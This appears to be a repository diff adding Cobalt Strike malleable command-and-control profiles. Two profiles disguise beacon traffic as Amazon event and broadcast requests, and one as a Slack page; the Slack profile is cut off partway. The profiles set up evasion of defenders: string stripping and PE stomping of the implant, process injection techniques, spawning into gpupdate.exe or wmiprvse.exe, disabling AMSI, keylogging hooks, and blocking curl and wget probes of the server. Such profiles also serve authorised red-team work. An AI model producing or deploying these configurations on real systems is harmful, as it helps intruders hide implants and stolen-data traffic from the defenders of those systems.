🤬
  • ■ ■ ■ ■ ■ ■
    Profiles/Amazon/amazon_events.profile
     1 +#amazon_events profile
     2 +#xx0hcd
     3 + 
     4 +###Global Options###
     5 +set sample_name "amazon_events.profile";
     6 + 
     7 +set sleeptime "38500";
     8 +set jitter "27";
     9 +set useragent "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36";
     10 +set data_jitter "50";
     11 + 
     12 +set host_stage "false";
     13 + 
     14 +###DNS options###
     15 +dns-beacon {
     16 + # Options moved into 'dns-beacon' group in 4.3:
     17 + set dns_idle "8.8.8.8";
     18 + set dns_max_txt "220";
     19 + set dns_sleep "0";
     20 + set dns_ttl "1";
     21 + set maxdns "255";
     22 + set dns_stager_prepend ".wwwds.";
     23 + set dns_stager_subhost ".e2867.dsca.";
     24 +
     25 + # DNS subhost override options added in 4.3:
     26 + set beacon "d-bx.";
     27 + set get_A "d-1ax.";
     28 + set get_AAAA "d-4ax.";
     29 + set get_TXT "d-1tx.";
     30 + set put_metadata "d-1mx";
     31 + set put_output "d-1ox.";
     32 + set ns_response "zero";
     33 +}
     34 + 
     35 +###SMB options###
     36 +set pipename "ntsvcs##";
     37 +set pipename_stager "scerpc##";
     38 +set smb_frame_header "";
     39 + 
     40 +###TCP options###
     41 +set tcp_port "8000";
     42 +set tcp_frame_header "";
     43 + 
     44 +###SSH BANNER###
     45 +set ssh_banner "Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-1065-aws x86_64)";
     46 +set ssh_pipename "SearchTextHarvester##";
     47 + 
     48 +###Steal Token
     49 +set steal_token_access_mask "11";
     50 + 
     51 +###Proxy Options
     52 +set tasks_max_size "1048576";
     53 +set tasks_proxy_max_size "921600";
     54 +set tasks_dns_proxy_max_size "71680";
     55 + 
     56 +###SSL Options###
     57 +#https-certificate {
     58 +# set keystore "domain001.store";
     59 +# set password "password123";
     60 +#}
     61 + 
     62 +#code-signer {
     63 + #set keystore "your_keystore.jks";
     64 + #set password "your_password";
     65 + #set alias "server";
     66 +#}
     67 + 
     68 +###HTTP-Config Block###
     69 +http-config {
     70 +# set headers "Server, Content-Type";
     71 +# header "Content-Type" "text/html;charset=UTF-8";
     72 +# header "Server" "nginx";
     73 +#
     74 + set trust_x_forwarded_for "false";
     75 +
     76 + set block_useragents "curl*,lynx*,wget*";
     77 +}
     78 + 
     79 +#set headers_remove "image/x-xbitmap, image/pjpeg, application/vnd";
     80 + 
     81 +###HTTP-GET Block###
     82 +http-get {
     83 + 
     84 + set uri "/broadcast";
     85 +
     86 + client {
     87 + 
     88 + #header "Host" "d23tl967axkois.cloudfront.net";
     89 + header "Accept" "application/json, text/plain, */*";
     90 + header "Accept-Language" "en-US,en;q=0.5";
     91 + header "Origin" "https://www.amazon.com";
     92 + header "Referer" "https://www.amazon.com";
     93 + header "Sec-Fetch-Dest" "empty";
     94 + header "Sec-Fetch-Mode" "cors";
     95 + header "Sec-Fetch-Site" "cross-site";
     96 + header "Te" "trailers";
     97 + 
     98 +
     99 + metadata {
     100 + base64;
     101 +
     102 + header "x-amzn-RequestId";
     103 + 
     104 + }
     105 + 
     106 + }
     107 + 
     108 + server {
     109 +
     110 + header "Content-Type" "application/json";
     111 + header "Access-Control-Allow-Origin" "https://www.amazon.com";
     112 + header "Access-Control-Allow-Methods" "GET";
     113 + header "Access-Control-Allow-Credentials" "true";
     114 + header "X-Amz-Version-Id" "null";
     115 + header "Server" "AmazonS3";
     116 + header "X-Cache" "Hit from cloudfront";
     117 +
     118 + output {
     119 + 
     120 + base64;
     121 +
     122 + prepend "
     123 +{\"broadcastEventsData\":{
     124 + \"54857e6d-c060-4b3c-914a-87adfcde093e\":{
     125 + \"lcid\":null,
     126 + \"chatStatus\":\"DISABLED\",
     127 + \"isChatEnabled\":false,
     128 + \"isCarouselEnabled\":null,
     129 + \"highlightedSegmentItemId\":\"";
     130 +
     131 + append "\"";
     132 + append "
     133 + },
     134 + \"B07YF1TNL7\":{
     135 + \"promotions\":null,
     136 + \"percentClaimed\":0,
     137 + \"primeAccessType\":null,
     138 + \"endDate\":\"1970-01-01T00:00:00Z\",
     139 + \"primeBenefitSaving\":null,
     140 + \"dealId\":\"2b2f3426\",
     141 + \"percentOff\":15,
     142 + \"state\":\"\",
     143 + \"dealPrice\":{
     144 + \"fractionalValue\":20,
     145 + \"currencySymbol\":\"$\",
     146 + \"wholeValue\":89
     147 + },
     148 + \"dealType\":\"BEST_DEAL\",
     149 + \"listPrice\":{
     150 + \"fractionalValue\":99,
     151 + \"currencySymbol\":\"$\",
     152 + \"wholeValue\":104
     153 + },
     154 + \"primeExclusive\":false
     155 + },
     156 + \"B071CQCBBN\":{
     157 + \"promotions\":null,
     158 + \"percentClaimed\":0,
     159 + \"primeAccessType\":null,
     160 + \"endDate\":\"1970-01-01T00:00:00Z\",
     161 + \"primeBenefitSaving\":null,
     162 + \"dealId\":\"09a7bbc8\",
     163 + \"percentOff\":15,
     164 + \"state\":\"\",
     165 + \"dealPrice\":{
     166 + \"fractionalValue\":99,
     167 + \"currencySymbol\":\"$\",
     168 + \"wholeValue\":84
     169 + },
     170 + \"dealType\":\"BEST_DEAL\",
     171 + \"listPrice\":{
     172 + \"fractionalValue\":99,
     173 + \"currencySymbol\":\"$\",
     174 + \"wholeValue\":99
     175 + },
     176 + \"primeExclusive\":false
     177 + }
     178 + },
     179 + \"throttled\":false
     180 + },
     181 + \"isLiveBadgeEnabled\":null,
     182 + \"liveViewers\":-1,
     183 + \"interactiveEvents\":[
     184 + ],
     185 + \"vods\":null,
     186 + \"hlsUrl\":
     187 + \"https://d22u79neyj432a.cloudfront.net/bfc50dfa-8e10-44b5-ae59-ac26bfc71489/54857e6d-c060-4b3c-914a-87adfcde093e.m3u8\"
     188 + }
     189 + },
     190 + \"version\":\"1.0\"
     191 +}";
     192 +
     193 + 
     194 + print;
     195 + }
     196 + }
     197 +}
     198 + 
     199 + 
     200 + 
     201 +###HTTP-Post Block###
     202 +http-post {
     203 +
     204 + set uri "/1/events/com.amazon.csm.csa.prod";
     205 + #set verb "GET";
     206 + set verb "POST";
     207 + 
     208 + client {
     209 + 
     210 + #header "Host" "unagi.amazon.com";
     211 + header "Accept" "*/*";
     212 + #header "Accept-Language" "en-US,en;q=0.5";
     213 + #header "Content-Type" "text/plain;charset=UTF-8";
     214 + header "Origin" "https://www.amazon.com";
     215 +
     216 + output {
     217 + base64url;
     218 +
     219 + prepend "{\"events\":[{\"data\":{\"schemaId\":\"csa.VideoInteractions.1\",\"application\":\"Retail:Prod:,\"requestId\":\"MBFV82TTQV2JNBKJJ50B\",\"title\":\"Amazon.com. Spend less. Smile more.\",\"subPageType\":\"desktop\",\"session\":{\"id\":\"133-9905055-2677266\"},\"video\":{\"id\":\"";
     220 + 
     221 + append "\"\n";
     222 + append "\"playerMode\":\"INLINE\",\"videoRequestId\":\"MBFV82TTQV2JNBKJJ50B\",\"isAudioOn\":\"false\",\"player\":\"IVS\",\"event\":\"NONE\"}}}}]}";
     223 + 
     224 +
     225 + print;
     226 +
     227 + }
     228 + 
     229 + id {
     230 + base64url;
     231 + #parameter "id";
     232 + header "x-amz-rid";
     233 + 
     234 + }
     235 + }
     236 + 
     237 + server {
     238 +
     239 + header "Server" "Server";
     240 + header "Content-Type" "application/json";
     241 + header "Connection" "close";
     242 + header "Access-Control-Allow-Origin" "https://www.amazon.com";
     243 + header "Access-Control-Expose-Headers" "x-amzn-RequestId,x-amzn-ErrorType,x-amzn-ErrorMessage,Date";
     244 + header "Access-Control-Allow-Credentials" "true";
     245 + header "Vary" "Origin,Content-Type,Accept-Encoding,X-Amzn-CDN-Cache,X-Amzn-AX-Treatment,User-Agent";
     246 + header "Permissions-Policy" "interest-cohort=()";
     247 + 
     248 + output {
     249 + netbios;
     250 +
     251 + prepend "\n";
     252 + prepend "{";
     253 +
     254 + append "\n";
     255 + append "}";
     256 + 
     257 + print;
     258 + }
     259 + }
     260 +}
     261 + 
     262 + 
     263 + 
     264 +###HTTP-Stager Block###
     265 +http-stager {
     266 + set uri_x86 "/1/Events/com.amazon.csm.csa.prod";
     267 + set uri_x64 "/2/events/com.amazon.csm.csa.prod";
     268 +
     269 + client {
     270 + 
     271 + #header "Host" "unagi.amazon.com";
     272 + header "Accept" "*/*";
     273 + header "Accept-Language" "en-US,en;q=0.5";
     274 + header "Connection" "close";
     275 + }
     276 +
     277 + server {
     278 +
     279 + header "Content-Type" "application/json";
     280 + header "Access-Control-Allow-Origin" "https://www.amazon.com";
     281 + header "Access-Control-Allow-Methods" "GET";
     282 + header "Access-Control-Allow-Credentials" "true";
     283 + header "X-Amz-Version-Id" "null";
     284 + header "Server" "AmazonS3";
     285 + header "X-Cache" "Hit from cloudfront";
     286 +
     287 + output {
     288 +
     289 + print;
     290 + }
     291 + }
     292 +}
     293 + 
     294 + 
     295 +###Malleable PE/Stage Block###
     296 +stage {
     297 + set checksum "0";
     298 + set compile_time "12 Dec 2019 02:52:11";
     299 + set entry_point "170000";
     300 + #set image_size_x86 "6586368";
     301 + #set image_size_x64 "6586368";
     302 + #set name "WWanMM.dll";
     303 + set userwx "false";
     304 + set cleanup "true";
     305 + set sleep_mask "true";
     306 + set stomppe "true";
     307 + set obfuscate "true";
     308 + set rich_header "";
     309 +
     310 + set sleep_mask "true";
     311 +
     312 + set smartinject "true";
     313 +
     314 + #set allocator "HeapAlloc";
     315 + set magic_mz_x86 "MZRE";
     316 + set magic_mz_x64 "MZAR";
     317 + set magic_pe "EA";
     318 + 
     319 + set module_x86 "wwanmm.dll";
     320 + set module_x64 "wwanmm.dll";
     321 + 
     322 + transform-x86 {
     323 + prepend "\x90\x90\x90";
     324 + strrep "ReflectiveLoader" "";
     325 + strrep "beacon.dll" "";
     326 + }
     327 + 
     328 + transform-x64 {
     329 + prepend "\x90\x90\x90";
     330 + strrep "ReflectiveLoader" "";
     331 + strrep "beacon.x64.dll" "";
     332 + }
     333 + 
     334 + #string "something";
     335 + #data "something";
     336 + #stringw "something";
     337 +}
     338 + 
     339 +###Process Inject Block###
     340 +process-inject {
     341 + 
     342 + set allocator "NtMapViewOfSection";
     343 +
     344 + set bof_allocator "VirtualAlloc";
     345 + set bof_reuse_memory "true";
     346 + 
     347 + set min_alloc "16700";
     348 + 
     349 + set userwx "false";
     350 +
     351 + set startrwx "true";
     352 +
     353 + transform-x86 {
     354 + prepend "\x90\x90\x90";
     355 + }
     356 + transform-x64 {
     357 + prepend "\x90\x90\x90";
     358 + }
     359 + 
     360 + execute {
     361 + #CreateThread;
     362 + #CreateRemoteThread;
     363 + 
     364 + CreateThread "ntdll.dll!RtlUserThreadStart+0x1000";
     365 + 
     366 + SetThreadContext;
     367 + 
     368 + NtQueueApcThread-s;
     369 + 
     370 + #NtQueueApcThread;
     371 + 
     372 + CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000";
     373 + 
     374 + CreateRemoteThread;
     375 + RtlCreateUserThread;
     376 + }
     377 +}
     378 + 
     379 +###Post-Ex Block###
     380 +post-ex {
     381 + 
     382 + set spawnto_x86 "%windir%\\syswow64\\gpupdate.exe";
     383 + set spawnto_x64 "%windir%\\sysnative\\gpupdate.exe";
     384 + 
     385 + set obfuscate "true";
     386 + 
     387 + set smartinject "true";
     388 + 
     389 + set amsi_disable "true";
     390 +
     391 + set thread_hint "ntdll.dll!RtlUserThreadStart+0x1000";
     392 + set pipename "DserNamePipe##, PGMessagePipe##, MsFteWds##";
     393 + set keylogger "SetWindowsHookEx";
     394 + 
     395 +}
     396 + 
  • ■ ■ ■ ■ ■ ■
    Profiles/Amazon/amazon_events_modified.profile
     1 +#amazon_events profile
     2 +#Created by xx0hcd
     3 +#Modified by Kleiton Kurti (@kleiton0x7e) & John Stigerwalt (@jstigerwalt1)
     4 + 
     5 +###Global Options###
     6 +set sample_name "amazon_events_modified.profile";
     7 + 
     8 +set sleeptime "18500";
     9 +set jitter "35";
     10 +set useragent "<RAND>"; # "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0"; Use random Internet Explorer UA by default
     11 +set data_jitter "50";
     12 + 
     13 +set host_stage "false";
     14 + 
     15 +set create_remote_thread "true"; # Allow beacon to create threads in other processes
     16 +set hijack_remote_thread "true"; # Allow beacon to run jobs by hijacking the primary thread of a suspeneded process
     17 + 
     18 +###DNS options###
     19 +dns-beacon {
     20 + # Options moved into 'dns-beacon' group in 4.3:
     21 + set dns_idle "8.8.8.8";
     22 + set dns_max_txt "220";
     23 + set dns_sleep "0";
     24 + set dns_ttl "1";
     25 + set maxdns "255";
     26 + set dns_stager_prepend ".wwwds.";
     27 + set dns_stager_subhost ".e2867.dsca.";
     28 +
     29 + # DNS subhost override options added in 4.3:
     30 + set beacon "d-bx.";
     31 + set get_A "d-1ax.";
     32 + set get_AAAA "d-4ax.";
     33 + set get_TXT "d-1tx.";
     34 + set put_metadata "d-1mx";
     35 + set put_output "d-1ox.";
     36 + set ns_response "zero";
     37 +}
     38 + 
     39 +###SMB options###
     40 +set pipename "ntsvcs##";
     41 +set pipename_stager "scerpc##";
     42 +set smb_frame_header "";
     43 + 
     44 +###TCP options###
     45 +set tcp_port "8000";
     46 +set tcp_frame_header "";
     47 + 
     48 +###SSH BANNER###
     49 +set ssh_banner "Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-1065-aws x86_64)";
     50 +set ssh_pipename "SearchTextHarvester##";
     51 + 
     52 +###Steal Token
     53 +set steal_token_access_mask "11";
     54 + 
     55 +###Proxy Options
     56 +set tasks_max_size "3604500";
     57 +set tasks_proxy_max_size "921600";
     58 +set tasks_dns_proxy_max_size "71680";
     59 + 
     60 +###SSL Options###
     61 +#https-certificate {
     62 +# set keystore "domain001.store";
     63 +# set password "password123";
     64 +#}
     65 + 
     66 +#code-signer {
     67 + #set keystore "your_keystore.jks";
     68 + #set password "your_password";
     69 + #set alias "server";
     70 +#}
     71 + 
     72 +###HTTP-Config Block###
     73 +http-config {
     74 +# set headers "Server, Content-Type";
     75 +# header "Content-Type" "text/html;charset=UTF-8";
     76 +# header "Server" "nginx";
     77 +#
     78 + set trust_x_forwarded_for "false";
     79 +
     80 + set block_useragents "curl*,lynx*,wget*";
     81 +}
     82 + 
     83 +#set headers_remove "image/x-xbitmap, image/pjpeg, application/vnd";
     84 + 
     85 +###HTTP-GET Block###
     86 +http-get {
     87 + 
     88 + set uri "/broadcast";
     89 +
     90 + client {
     91 + 
     92 + #header "Host" "d23tl967axkois.cloudfront.net";
     93 + header "Accept" "application/json, text/plain, */*";
     94 + header "Accept-Language" "en-US,en;q=0.5";
     95 + header "Origin" "https://www.amazon.com";
     96 + header "Referer" "https://www.amazon.com";
     97 + header "Sec-Fetch-Dest" "empty";
     98 + header "Sec-Fetch-Mode" "cors";
     99 + header "Sec-Fetch-Site" "cross-site";
     100 + header "Te" "trailers";
     101 + 
     102 +
     103 + metadata {
     104 + base64;
     105 +
     106 + header "x-amzn-RequestId";
     107 + 
     108 + }
     109 + 
     110 + }
     111 + 
     112 + server {
     113 +
     114 + header "Content-Type" "application/json";
     115 + header "Access-Control-Allow-Origin" "https://www.amazon.com";
     116 + header "Access-Control-Allow-Methods" "GET";
     117 + header "Access-Control-Allow-Credentials" "true";
     118 + header "X-Amz-Version-Id" "null";
     119 + header "Server" "AmazonS3";
     120 + header "X-Cache" "Hit from cloudfront";
     121 +
     122 + output {
     123 + 
     124 + base64;
     125 +
     126 + prepend "
     127 +{\"broadcastEventsData\":{
     128 + \"54857e6d-c060-4b3c-914a-87adfcde093e\":{
     129 + \"lcid\":null,
     130 + \"chatStatus\":\"DISABLED\",
     131 + \"isChatEnabled\":false,
     132 + \"isCarouselEnabled\":null,
     133 + \"highlightedSegmentItemId\":\"";
     134 +
     135 + append "\"";
     136 + append "
     137 + },
     138 + \"B07YF1TNL7\":{
     139 + \"promotions\":null,
     140 + \"percentClaimed\":0,
     141 + \"primeAccessType\":null,
     142 + \"endDate\":\"1970-01-01T00:00:00Z\",
     143 + \"primeBenefitSaving\":null,
     144 + \"dealId\":\"2b2f3426\",
     145 + \"percentOff\":15,
     146 + \"state\":\"\",
     147 + \"dealPrice\":{
     148 + \"fractionalValue\":20,
     149 + \"currencySymbol\":\"$\",
     150 + \"wholeValue\":89
     151 + },
     152 + \"dealType\":\"BEST_DEAL\",
     153 + \"listPrice\":{
     154 + \"fractionalValue\":99,
     155 + \"currencySymbol\":\"$\",
     156 + \"wholeValue\":104
     157 + },
     158 + \"primeExclusive\":false
     159 + },
     160 + \"B071CQCBBN\":{
     161 + \"promotions\":null,
     162 + \"percentClaimed\":0,
     163 + \"primeAccessType\":null,
     164 + \"endDate\":\"1970-01-01T00:00:00Z\",
     165 + \"primeBenefitSaving\":null,
     166 + \"dealId\":\"09a7bbc8\",
     167 + \"percentOff\":15,
     168 + \"state\":\"\",
     169 + \"dealPrice\":{
     170 + \"fractionalValue\":99,
     171 + \"currencySymbol\":\"$\",
     172 + \"wholeValue\":84
     173 + },
     174 + \"dealType\":\"BEST_DEAL\",
     175 + \"listPrice\":{
     176 + \"fractionalValue\":99,
     177 + \"currencySymbol\":\"$\",
     178 + \"wholeValue\":99
     179 + },
     180 + \"primeExclusive\":false
     181 + }
     182 + },
     183 + \"throttled\":false
     184 + },
     185 + \"isLiveBadgeEnabled\":null,
     186 + \"liveViewers\":-1,
     187 + \"interactiveEvents\":[
     188 + ],
     189 + \"vods\":null,
     190 + \"hlsUrl\":
     191 + \"https://d22u79neyj432a.cloudfront.net/bfc50dfa-8e10-44b5-ae59-ac26bfc71489/54857e6d-c060-4b3c-914a-87adfcde093e.m3u8\"
     192 + }
     193 + },
     194 + \"version\":\"1.0\"
     195 +}";
     196 +
     197 + 
     198 + print;
     199 + }
     200 + }
     201 +}
     202 + 
     203 + 
     204 + 
     205 +###HTTP-Post Block###
     206 +http-post {
     207 +
     208 + set uri "/1/events/com.amazon.csm.csa.prod";
     209 + #set verb "GET";
     210 + set verb "POST";
     211 + 
     212 + client {
     213 + 
     214 + #header "Host" "unagi.amazon.com";
     215 + header "Accept" "*/*";
     216 + #header "Accept-Language" "en-US,en;q=0.5";
     217 + #header "Content-Type" "text/plain;charset=UTF-8";
     218 + header "Origin" "https://www.amazon.com";
     219 +
     220 + output {
     221 + base64url;
     222 +
     223 + prepend "{\"events\":[{\"data\":{\"schemaId\":\"csa.VideoInteractions.1\",\"application\":\"Retail:Prod:,\"requestId\":\"MBFV82TTQV2JNBKJJ50B\",\"title\":\"Amazon.com. Spend less. Smile more.\",\"subPageType\":\"desktop\",\"session\":{\"id\":\"133-9905055-2677266\"},\"video\":{\"id\":\"";
     224 + 
     225 + append "\"\n";
     226 + append "\"playerMode\":\"INLINE\",\"videoRequestId\":\"MBFV82TTQV2JNBKJJ50B\",\"isAudioOn\":\"false\",\"player\":\"IVS\",\"event\":\"NONE\"}}}}]}";
     227 + 
     228 +
     229 + print;
     230 +
     231 + }
     232 + 
     233 + id {
     234 + base64url;
     235 + #parameter "id";
     236 + header "x-amz-rid";
     237 + 
     238 + }
     239 + }
     240 + 
     241 + server {
     242 +
     243 + header "Server" "Server";
     244 + header "Content-Type" "application/json";
     245 + header "Connection" "close";
     246 + header "Access-Control-Allow-Origin" "https://www.amazon.com";
     247 + header "Access-Control-Expose-Headers" "x-amzn-RequestId,x-amzn-ErrorType,x-amzn-ErrorMessage,Date";
     248 + header "Access-Control-Allow-Credentials" "true";
     249 + header "Vary" "Origin,Content-Type,Accept-Encoding,X-Amzn-CDN-Cache,X-Amzn-AX-Treatment,User-Agent";
     250 + header "Permissions-Policy" "interest-cohort=()";
     251 + 
     252 + output {
     253 + netbios;
     254 +
     255 + prepend "\n";
     256 + prepend "{";
     257 +
     258 + append "\n";
     259 + append "}";
     260 + 
     261 + print;
     262 + }
     263 + }
     264 +}
     265 + 
     266 + 
     267 + 
     268 +###HTTP-Stager Block###
     269 +http-stager {
     270 + set uri_x86 "/1/Events/com.amazon.csm.csa.prod";
     271 + set uri_x64 "/2/events/com.amazon.csm.csa.prod";
     272 +
     273 + client {
     274 + 
     275 + #header "Host" "unagi.amazon.com";
     276 + header "Accept" "*/*";
     277 + header "Accept-Language" "en-US,en;q=0.5";
     278 + header "Connection" "close";
     279 + }
     280 +
     281 + server {
     282 +
     283 + header "Content-Type" "application/json";
     284 + header "Access-Control-Allow-Origin" "https://www.amazon.com";
     285 + header "Access-Control-Allow-Methods" "GET";
     286 + header "Access-Control-Allow-Credentials" "true";
     287 + header "X-Amz-Version-Id" "null";
     288 + header "Server" "AmazonS3";
     289 + header "X-Cache" "Hit from cloudfront";
     290 +
     291 + output {
     292 +
     293 + print;
     294 + }
     295 + }
     296 +}
     297 + 
     298 + 
     299 +###Malleable PE/Stage Block###
     300 +stage {
     301 + set checksum "0";
     302 + set compile_time "5 May 2023 10:52:15";
     303 + set entry_point "170000";
     304 + #set image_size_x86 "6586368";
     305 + #set image_size_x64 "6586368";
     306 + set name "srv.dll";
     307 + set magic_mz_x64 "OOPS";
     308 + set magic_mz_x86 "OOPS";
     309 + set userwx "false";
     310 + set cleanup "true";
     311 + set sleep_mask "true";
     312 + set stomppe "true";
     313 + set obfuscate "true";
     314 + set rich_header "\x71\xd5\xdf\x19\x38\x77\xab\x8d\x2b\x41\x5e\xcb\x98\x22\x05\x90";
     315 +
     316 + set sleep_mask "true";
     317 +
     318 + set smartinject "true";
     319 +
     320 + #set allocator "HeapAlloc";
     321 + set magic_pe "EA";
     322 + 
     323 + set module_x86 "wwanmm.dll";
     324 + set module_x64 "wwanmm.dll";
     325 + 
     326 + transform-x86 {
     327 + prepend "\x44\x40\x4B\x43\x4C\x48\x90\x66\x90\x0F\x1F\x00\x66\x0F\x1F\x04\x00\x0F\x1F\x04\x00\x0F\x1F\x00\x0F\x1F\x00";
     328 + strrep "This program cannot be run in DOS mode" ""; # Remove this text
     329 + strrep "ReflectiveLoader" "";
     330 + strrep "beacon.dll" "";
     331 + strrep "beacon.dll" ""; # Remove this text
     332 + strrep "msvcrt.dll" "";
     333 + strrep "C:\\Windows\\System32\\msvcrt.dll" "";
     334 + }
     335 + 
     336 + transform-x64 {
     337 + prepend "\x44\x40\x4B\x43\x4C\x48\x90\x66\x90\x0F\x1F\x00\x66\x0F\x1F\x04\x00\x0F\x1F\x04\x00\x0F\x1F\x00\x0F\x1F\x00";
     338 + strrep "This program cannot be run in DOS mode" ""; # Remove this text
     339 + strrep "ReflectiveLoader" "";
     340 + strrep "beacon.x64.dll" "";
     341 + strrep "beacon.dll" ""; # Remove this text
     342 + strrep "msvcrt.dll" "";
     343 + strrep "C:\\Windows\\System32\\msvcrt.dll" "";
     344 + strrep "Stack around the variable" "";
     345 + strrep "was corrupted." "";
     346 + strrep "The variable" "";
     347 + strrep "is being used without being initialized." "";
     348 + strrep "The value of ESP was not properly saved across a function call. This is usually a result of calling a function declared with one calling convention with a function pointer declared" "";
     349 + strrep "A cast to a smaller data type has caused a loss of data. If this was intentional, you should mask the source of the cast with the appropriate bitmask. For example:" "";
     350 + strrep "Changing the code in this way will not affect the quality of the resulting optimized code." "";
     351 + strrep "Stack memory was corrupted" "";
     352 + strrep "A local variable was used before it was initialized" "";
     353 + strrep "Stack memory around _alloca was corrupted" "";
     354 + strrep "Unknown Runtime Check Error" "";
     355 + strrep "Unknown Filename" "";
     356 + strrep "Unknown Module Name" "";
     357 + strrep "Run-Time Check Failure" "";
     358 + strrep "Stack corrupted near unknown variable" "";
     359 + strrep "Stack pointer corruption" "";
     360 + strrep "Cast to smaller type causing loss of data" "";
     361 + strrep "Stack memory corruption" "";
     362 + strrep "Local variable used before initialization" "";
     363 + strrep "Stack around" "corrupted";
     364 + strrep "operator" "";
     365 + strrep "operator co_await" "";
     366 + strrep "operator<=>" "";
     367 + }
     368 +}
     369 + 
     370 +###Process Inject Block###
     371 +process-inject {
     372 + set allocator "NtMapViewOfSection";
     373 + set bof_allocator "VirtualAlloc";
     374 + set bof_reuse_memory "true";
     375 + set min_alloc "16700";
     376 + set userwx "false";
     377 + set startrwx "false";
     378 +
     379 + transform-x86 {
     380 + prepend "\x44\x40\x4B\x43\x4C\x48\x90\x66\x90\x0F\x1F\x00\x66\x0F\x1F\x04\x00\x0F\x1F\x04\x00\x0F\x1F\x00\x0F\x1F\x00";
     381 + }
     382 + transform-x64 {
     383 + prepend "\x44\x40\x4B\x43\x4C\x48\x90\x66\x90\x0F\x1F\x00\x66\x0F\x1F\x04\x00\x0F\x1F\x04\x00\x0F\x1F\x00\x0F\x1F\x00";
     384 + }
     385 + 
     386 + execute {
     387 + #CreateThread;
     388 + #CreateRemoteThread;
     389 + CreateThread "ntdll.dll!RtlUserThreadStart+0x1000";
     390 + SetThreadContext;
     391 + NtQueueApcThread-s;
     392 + #NtQueueApcThread;
     393 + CreateRemoteThread "kernel32.dll!LoadLibraryA+0x1000";
     394 + CreateRemoteThread;
     395 + RtlCreateUserThread;
     396 + }
     397 +}
     398 + 
     399 +###Post-Ex Block###
     400 +post-ex {
     401 + set spawnto_x86 "%windir%\\syswow64\\wbem\\wmiprvse.exe -Embedding";
     402 + set spawnto_x64 "%windir%\\sysnative\\wbem\\wmiprvse.exe -Embedding";
     403 + set obfuscate "true";
     404 + set smartinject "true";
     405 + set amsi_disable "false";
     406 + set keylogger "GetAsyncKeyState";
     407 + #set threadhint "module!function+0x##"
     408 +}
     409 + 
  • ■ ■ ■ ■ ■ ■
    Profiles/Slack/slack.profile
     1 +#slack profile
     2 +#used a MS dev group from a 'top slack groups' list
     3 +#xx0hcd
     4 + 
     5 + 
     6 +set sleeptime "30000";
     7 +set jitter "20";
     8 +set useragent "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko)";
     9 +set dns_idle "8.8.8.8";
     10 +set maxdns "235";
     11 + 
     12 +#custom cert
     13 +#https-certificate {
     14 +# set keystore "your_store_file.store";
     15 +# set password "your_store_pass";
     16 +#}
     17 + 
     18 +http-config {
     19 +# set headers "Server, Content-Type, Cache-Control, Connection";
     20 +# header "Content-Type" "text/html;charset=UTF-8";
     21 +# header "Connection" "close";
     22 +# header "Cache-Control" "max-age=2";
     23 +# header "Server" "nginx";
     24 + #set "true" if teamserver is behind redirector
     25 + set trust_x_forwarded_for "false";
     26 +}
     27 + 
     28 +http-get {
     29 + 
     30 + set uri "/messages/C0527B0NM";
     31 +
     32 + client {
     33 + 
     34 +# header "Host" "msdevchat.slack.com";
     35 + header "Accept" "*/*";
     36 + header "Accept-Language" "en-US";
     37 + header "Connection" "close";
     38 +
     39 +
     40 + metadata {
     41 + base64url;
     42 +
     43 + append ";_ga=GA1.2.875";
     44 + append ";__ar_v4=%8867UMDGS643";
     45 + prepend "d=";
     46 +# prepend "cvo_sid1=R456BNMD64;";
     47 + prepend "_ga=GA1.2.875;";
     48 + prepend "b=.12vPkW22o;";
     49 + header "Cookie";
     50 + 
     51 + }
     52 + 
     53 + }
     54 + 
     55 + server {
     56 + 
     57 + header "Content-Type" "text/html; charset=utf-8";
     58 + header "Connection" "close";
     59 + header "Server" "Apache";
     60 + header "X-XSS-Protection" "0";
     61 + header "Strict-Transport-Security" "max-age=31536000; includeSubDomains; preload";
     62 + header "Referrer-Policy" "no-referrer";
     63 + header "X-Slack-Backend" "h";
     64 + header "Pragma" "no-cache";
     65 + header "Cache-Control" "private, no-cache, no-store, must-revalidate";
     66 + header "X-Frame-Options" "SAMEORIGIN";
     67 + header "Vary" "Accept-Encoding";
     68 + header "X-Via" "haproxy-www-w6k7";
     69 +
     70 + 
     71 + output {
     72 + 
     73 + base64url;
     74 + 
     75 + prepend "<!DOCTYPE html>
     76 +<html lang=\"en-US\" class=\"supports_custom_scrollbar\">
     77 + 
     78 + <head>
     79 + 
     80 +<meta charset=\"utf-8\">
     81 +<meta http-equiv=\"X-UA-Compatible\" content=\"IE=edge,chrome=1\">
     82 +<meta name=\"referrer\" content=\"no-referrer\">
     83 +<meta name=\"superfish\" content=\"nofish\">
     84 + <title>Microsoft Developer Chat Slack</title>
     85 + <meta name=\"author\" content=\"Slack\">
     86 +
     87 + 
     88 + <link rel=\"dns-prefetch\" href=\"https://a.slack-edge.com?id=";
     89 + 
     90 + append "\"> </script>";
     91 +
     92 + append "<div id=\"client-ui\" class=\"container-fluid sidebar_theme_\"\"\">
     93 + 
     94 +
     95 +<div id=\"banner\" class=\"hidden\" role=\"complementary\" aria-labelledby=\"notifications_banner_aria_label\">
     96 + <h1 id=\"notifications_banner_aria_label\" class=\"offscreen\">Notifications Banner</h1>
     97 + 
     98 + <div id=\"notifications_banner\" class=\"banner sk_fill_blue_bg hidden\">
     99 + Slack needs your permission to <button type=\"button\" class=\"btn_link\">enable desktop notifications</button>. <button type=\"button\" class=\"btn_unstyle banner_dismiss ts_icon ts_icon_times_circle\" data-action=\"dismiss_banner\" aria-label=\"Dismiss\"></button>
     100 + </div>
     101 + 
     102 + <div id=\"notifications_dismiss_banner\" class=\"banner seafoam_green_bg hidden\">
     103 + We strongly recommend enabling desktop notifications if you’ll be using Slack on this computer. <span class=\"inline_block no_wrap\">
     104 + <button type=\"button\" class=\"btn_link\" onclick=\"TS.ui.banner.close(); TS.ui.banner.growlsPermissionPrompt();\">Enable notifications</button> •
     105 + <button type=\"button\" class=\"btn_link\" onclick=\"TS.ui.banner.close()\">Ask me next time</button> •
     106 + <button type=\"button\" class=\"btn_link\" onclick=\"TS.ui.banner.closeNagAndSetCookie()\">Never ask again on this computer</button>
     107 + </span>
     108 + </div>";
     109 + 
     110 + print;
     111 + }
     112 + }
     113 +}
     114 + 
     115 +http-post {
     116 +
